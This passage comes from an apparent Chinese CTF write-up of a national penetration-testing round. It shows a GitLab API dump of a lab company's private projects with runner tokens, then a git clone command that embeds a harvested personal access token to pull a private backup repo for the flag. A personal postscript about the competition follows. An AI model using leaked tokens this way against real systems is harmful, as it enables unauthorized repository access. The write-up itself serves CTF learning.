        "topics": [],
        "ssh_url_to_repo": "git@192.168.8.42:vertexsoft/hexo.git",
        "http_url_to_repo": "http://192.168.8.42/vertexsoft/hexo.git",
        "web_url": "http://192.168.8.42/vertexsoft/hexo",
        "readme_url": "http://192.168.8.42/vertexsoft/hexo/-/blob/master/README.md",
        "forks_count": 0,
        "avatar_url": null,
        "star_count": 0,
        "last_activity_at": "2024-07-11T17:01:31.661Z",
        "namespace": {
            "id": 2,
            "name": "VertexSoft",
            "path": "vertexsoft",
            "kind": "group",
            "full_path": "vertexsoft",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://192.168.8.42/groups/vertexsoft"
        },
        "repository_storage": "default",
        "_links": {
            "self": "http://192.168.8.42/api/v4/projects/4",
            "issues": "http://192.168.8.42/api/v4/projects/4/issues",
            "merge_requests": "http://192.168.8.42/api/v4/projects/4/merge_requests",
            "repo_branches": "http://192.168.8.42/api/v4/projects/4/repository/branches",
            "labels": "http://192.168.8.42/api/v4/projects/4/labels",
            "events": "http://192.168.8.42/api/v4/projects/4/events",
            "members": "http://192.168.8.42/api/v4/projects/4/members",
            "cluster_agents": "http://192.168.8.42/api/v4/projects/4/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2024-07-12T17:01:32.184Z"
        },
        "repository_object_format": "sha1",
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "model_experiments_access_level": "enabled",
        "model_registry_access_level": "enabled",
        "emails_disabled": false,
        "emails_enabled": true,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_url": null,
        "import_type": "gitlab_project",
        "import_status": "finished",
        "open_issues_count": 0,
        "description_html": "<p data-sourcepos=\"1:1-1:4\" dir=\"auto\">Hexo</p>",
        "updated_at": "2024-07-11T17:01:32.535Z",
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_forward_deployment_rollback_allowed": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "build_git_strategy": "fetch",
        "keep_latest_artifact": true,
        "restrict_user_defined_variables": false,
        "runners_token": "GR1348941CyxAy3dnsudA95t35ucx",
        "runner_token_expiration_interval": null,
        "group_runners_enabled": true,
        "auto_cancel_pending_pipelines": "enabled",
        "build_timeout": 3600,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "ci_config_path": null,
        "public_jobs": true,
        "shared_with_groups": [],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "warn_about_potentially_unwanted_characters": true,
        "autoclose_referenced_issues": true,
        "permissions": {
            "project_access": {
                "access_level": 40,
                "notification_level": null
            },
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 3,
        "description": "VertexSoft Internal Employee Service App",
        "name": "VertexApp",
        "name_with_namespace": "VertexSoft / VertexApp",
        "path": "vertexapp",
        "path_with_namespace": "vertexsoft/vertexapp",
        "created_at": "2024-07-11T17:00:59.905Z",
        "default_branch": "master",
        "tag_list": [],
        "topics": [],
        "ssh_url_to_repo": "git@192.168.8.42:vertexsoft/vertexapp.git",
        "http_url_to_repo": "http://192.168.8.42/vertexsoft/vertexapp.git",
        "web_url": "http://192.168.8.42/vertexsoft/vertexapp",
        "readme_url": "http://192.168.8.42/vertexsoft/vertexapp/-/blob/master/README.md",
        "forks_count": 0,
        "avatar_url": null,
        "star_count": 0,
        "last_activity_at": "2024-07-11T17:00:59.877Z",
        "namespace": {
            "id": 2,
            "name": "VertexSoft",
            "path": "vertexsoft",
            "kind": "group",
            "full_path": "vertexsoft",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://192.168.8.42/groups/vertexsoft"
        },
        "repository_storage": "default",
        "_links": {
            "self": "http://192.168.8.42/api/v4/projects/3",
            "issues": "http://192.168.8.42/api/v4/projects/3/issues",
            "merge_requests": "http://192.168.8.42/api/v4/projects/3/merge_requests",
            "repo_branches": "http://192.168.8.42/api/v4/projects/3/repository/branches",
            "labels": "http://192.168.8.42/api/v4/projects/3/labels",
            "events": "http://192.168.8.42/api/v4/projects/3/events",
            "members": "http://192.168.8.42/api/v4/projects/3/members",
            "cluster_agents": "http://192.168.8.42/api/v4/projects/3/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2024-07-12T17:01:00.306Z"
        },
        "repository_object_format": "sha1",
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "model_experiments_access_level": "enabled",
        "model_registry_access_level": "enabled",
        "emails_disabled": false,
        "emails_enabled": true,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_url": null,
        "import_type": "gitlab_project",
        "import_status": "finished",
        "open_issues_count": 0,
        "description_html": "<p data-sourcepos=\"1:1-1:40\" dir=\"auto\">VertexSoft Internal Employee Service App</p>",
        "updated_at": "2024-07-11T17:01:00.622Z",
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_forward_deployment_rollback_allowed": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "build_git_strategy": "fetch",
        "keep_latest_artifact": true,
        "restrict_user_defined_variables": false,
        "runners_token": "GR1348941nmFUY2NxrQoLyDNnGYPx",
        "runner_token_expiration_interval": null,
        "group_runners_enabled": true,
        "auto_cancel_pending_pipelines": "enabled",
        "build_timeout": 3600,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "ci_config_path": null,
        "public_jobs": true,
        "shared_with_groups": [],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "warn_about_potentially_unwanted_characters": true,
        "autoclose_referenced_issues": true,
        "permissions": {
            "project_access": {
                "access_level": 40,
                "notification_level": null
            },
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 2,
        "description": "VertexSoft's old ERP system",
        "name": "ERP_Old",
        "name_with_namespace": "VertexSoft / ERP_Old",
        "path": "erp_old",
        "path_with_namespace": "vertexsoft/erp_old",
        "created_at": "2024-07-11T17:00:05.051Z",
        "default_branch": "master",
        "tag_list": [],
        "topics": [],
        "ssh_url_to_repo": "git@192.168.8.42:vertexsoft/erp_old.git",
        "http_url_to_repo": "http://192.168.8.42/vertexsoft/erp_old.git",
        "web_url": "http://192.168.8.42/vertexsoft/erp_old",
        "readme_url": "http://192.168.8.42/vertexsoft/erp_old/-/blob/master/README.md",
        "forks_count": 0,
        "avatar_url": null,
        "star_count": 0,
        "last_activity_at": "2024-07-11T17:00:05.004Z",
        "namespace": {
            "id": 2,
            "name": "VertexSoft",
            "path": "vertexsoft",
            "kind": "group",
            "full_path": "vertexsoft",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://192.168.8.42/groups/vertexsoft"
        },
        "repository_storage": "default",
        "_links": {
            "self": "http://192.168.8.42/api/v4/projects/2",
            "issues": "http://192.168.8.42/api/v4/projects/2/issues",
            "merge_requests": "http://192.168.8.42/api/v4/projects/2/merge_requests",
            "repo_branches": "http://192.168.8.42/api/v4/projects/2/repository/branches",
            "labels": "http://192.168.8.42/api/v4/projects/2/labels",
            "events": "http://192.168.8.42/api/v4/projects/2/events",
            "members": "http://192.168.8.42/api/v4/projects/2/members",
            "cluster_agents": "http://192.168.8.42/api/v4/projects/2/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2024-07-12T17:00:07.041Z"
        },
        "repository_object_format": "sha1",
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "model_experiments_access_level": "enabled",
        "model_registry_access_level": "enabled",
        "emails_disabled": false,
        "emails_enabled": true,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_url": null,
        "import_type": "gitlab_project",
        "import_status": "finished",
        "open_issues_count": 0,
        "description_html": "<p data-sourcepos=\"1:1-1:27\" dir=\"auto\">VertexSoft's old ERP system</p>",
        "updated_at": "2024-07-11T17:00:07.428Z",
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_forward_deployment_rollback_allowed": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "build_git_strategy": "fetch",
        "keep_latest_artifact": true,
        "restrict_user_defined_variables": false,
        "runners_token": "GR1348941iNU3bBzdNg5pzdrmapMJ",
        "runner_token_expiration_interval": null,
        "group_runners_enabled": true,
        "auto_cancel_pending_pipelines": "enabled",
        "build_timeout": 3600,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "ci_config_path": null,
        "public_jobs": true,
        "shared_with_groups": [],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "warn_about_potentially_unwanted_characters": true,
        "autoclose_referenced_issues": true,
        "permissions": {
            "project_access": {
                "access_level": 40,
                "notification_level": null
            },
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    },
    {
        "id": 1,
        "description": null,
        "name": "PortalCode",
        "name_with_namespace": "VertexSoft / PortalCode",
        "path": "portalcode",
        "path_with_namespace": "vertexsoft/portalcode",
        "created_at": "2024-07-11T15:53:27.257Z",
        "default_branch": "main",
        "tag_list": [],
        "topics": [],
        "ssh_url_to_repo": "git@192.168.8.42:vertexsoft/portalcode.git",
        "http_url_to_repo": "http://192.168.8.42/vertexsoft/portalcode.git",
        "web_url": "http://192.168.8.42/vertexsoft/portalcode",
        "readme_url": "http://192.168.8.42/vertexsoft/portalcode/-/blob/main/README.md",
        "forks_count": 0,
        "avatar_url": null,
        "star_count": 0,
        "last_activity_at": "2024-07-15T14:30:40.441Z",
        "namespace": {
            "id": 2,
            "name": "VertexSoft",
            "path": "vertexsoft",
            "kind": "group",
            "full_path": "vertexsoft",
            "parent_id": null,
            "avatar_url": null,
            "web_url": "http://192.168.8.42/groups/vertexsoft"
        },
        "repository_storage": "default",
        "_links": {
            "self": "http://192.168.8.42/api/v4/projects/1",
            "issues": "http://192.168.8.42/api/v4/projects/1/issues",
            "merge_requests": "http://192.168.8.42/api/v4/projects/1/merge_requests",
            "repo_branches": "http://192.168.8.42/api/v4/projects/1/repository/branches",
            "labels": "http://192.168.8.42/api/v4/projects/1/labels",
            "events": "http://192.168.8.42/api/v4/projects/1/events",
            "members": "http://192.168.8.42/api/v4/projects/1/members",
            "cluster_agents": "http://192.168.8.42/api/v4/projects/1/cluster_agents"
        },
        "packages_enabled": true,
        "empty_repo": false,
        "archived": false,
        "visibility": "private",
        "resolve_outdated_diff_discussions": false,
        "container_expiration_policy": {
            "cadence": "1d",
            "enabled": false,
            "keep_n": 10,
            "older_than": "90d",
            "name_regex": ".*",
            "name_regex_keep": null,
            "next_run_at": "2024-07-12T15:53:27.309Z"
        },
        "repository_object_format": "sha1",
        "issues_enabled": true,
        "merge_requests_enabled": true,
        "wiki_enabled": true,
        "jobs_enabled": true,
        "snippets_enabled": true,
        "container_registry_enabled": true,
        "service_desk_enabled": false,
        "service_desk_address": null,
        "can_create_merge_request_in": true,
        "issues_access_level": "enabled",
        "repository_access_level": "enabled",
        "merge_requests_access_level": "enabled",
        "forking_access_level": "enabled",
        "wiki_access_level": "enabled",
        "builds_access_level": "enabled",
        "snippets_access_level": "enabled",
        "pages_access_level": "private",
        "analytics_access_level": "enabled",
        "container_registry_access_level": "enabled",
        "security_and_compliance_access_level": "private",
        "releases_access_level": "enabled",
        "environments_access_level": "enabled",
        "feature_flags_access_level": "enabled",
        "infrastructure_access_level": "enabled",
        "monitor_access_level": "enabled",
        "model_experiments_access_level": "enabled",
        "model_registry_access_level": "enabled",
        "emails_disabled": false,
        "emails_enabled": true,
        "shared_runners_enabled": true,
        "lfs_enabled": true,
        "creator_id": 1,
        "import_url": null,
        "import_type": null,
        "import_status": "none",
        "open_issues_count": 0,
        "description_html": "",
        "updated_at": "2024-07-15T14:37:09.617Z",
        "ci_default_git_depth": 20,
        "ci_forward_deployment_enabled": true,
        "ci_forward_deployment_rollback_allowed": true,
        "ci_job_token_scope_enabled": false,
        "ci_separated_caches": true,
        "ci_allow_fork_pipelines_to_run_in_parent_project": true,
        "build_git_strategy": "fetch",
        "keep_latest_artifact": true,
        "restrict_user_defined_variables": false,
        "runners_token": "GR13489414oQjRCnTobkTwZpR65iS",
        "runner_token_expiration_interval": null,
        "group_runners_enabled": true,
        "auto_cancel_pending_pipelines": "enabled",
        "build_timeout": 3600,
        "auto_devops_enabled": true,
        "auto_devops_deploy_strategy": "continuous",
        "ci_config_path": null,
        "public_jobs": true,
        "shared_with_groups": [],
        "only_allow_merge_if_pipeline_succeeds": false,
        "allow_merge_on_skipped_pipeline": null,
        "request_access_enabled": true,
        "only_allow_merge_if_all_discussions_are_resolved": false,
        "remove_source_branch_after_merge": true,
        "printing_merge_request_link_enabled": true,
        "merge_method": "merge",
        "squash_option": "default_off",
        "enforce_auth_checks_on_uploads": true,
        "suggestion_commit_message": null,
        "merge_commit_template": null,
        "squash_commit_template": null,
        "issue_branch_template": null,
        "warn_about_potentially_unwanted_characters": true,
        "autoclose_referenced_issues": true,
        "permissions": {
            "project_access": null,
            "group_access": {
                "access_level": 50,
                "notification_level": 3
            }
        }
    }
]

git 下来

1	git clone http://192.168.8.42:glpat-bGEgHAJDvwaPP78rsLeS@192.168.8.42/vertexsoft/vertexsoftbackup.git

一个 txt 文件，里面就有 flag

RODC

可惜了，30 多解 600 分的题没出，说是打下的 mysql 那台机子有个文件，里面有账密，md30 多解出不了，4 解的题拿一血，我真服了我这。

一个人打渗透思路还是太局限了

b11e9cec339a2ebb171635969a11832

好在最后还是拿了国一，rank14.

后日谈

这次的表现不够完美，说实话这次对自己没那么自信，压力也挺大的，因为本来我们队伍并不是最强的队伍，本来我们指望自己冲国一的希望不大，想着是山河 giegie 他们那队冲国一，我们拿个国二啥的稳一下，结果不出意外的话出了意外。然后拿国一的重任就给我们了，我们队一个 web、一个 pwn、一个 re、一个 misc。说真的打国赛这种线下，尤其是 awdp 和渗透占大头的赛制，相对而言比较吃亏。很多其它队伍好像有两个 web 手，抗衡起来还是很难的。在正式比赛的前一天晚上，我和 k✌说自己一个 web 手打人家两个 web 有点吃力，他说我要相信自己，一个 web 打两个 web 没问题的。

结果是好的，只是自己的一些小失误，发挥没那么完美，其实有望前十的，自己两天都犯失误了，没办法，人生总会有不完美的，总是会有点遗憾的，今年的遗憾还能接受，去年

山河 giegie 他们 awd 进了大坑，赛宁 awd 给的是私钥登录，但是他们四个人全用 finalshell，没有 xshell，finalshell 没法私钥登进去，说是等了一个多小时找工作人员拷了 xshell。awd 少一个小时啥概念啊，k✌说是 awd 打了 60 多，好在第二天他们渗透上分，冲到了国二，很遗憾，本来是由国一的，于是他们今年打算再冲一年冲个国一，结果世事难料，今年在分区赛提前退役了属于是😭，在此致敬传奇 web 手山河。

今年上海大学生线下也是赛宁办的 awd，当时和 inkey 还有🐱✌一起，开始前听到裁判说用文件登录靶机，直接应激了，立马就和 inkey✌说让他现下一个 xshell。

带着山河 giegie 的意志以及指导老师的期望，手感火热拿了国一，k✌由于要和生活对线，打完这场也是直接退役了。一句经典说的好，“如今国一就在我面前，我必须得考虑这是否会是我此生仅有的机会”。能打国赛的机会不多，大一下很难有资格或实力打进国决，大二是最有希望的一年，因为大三因为实习、准备工作等各种事分散精力，冲国一的可能性也少了。

打完比赛也是走一走四川看一看

这美丽的川带，这建筑，某北京郊区学校羡慕了。

be61b4207672c398d33c746fe7e74af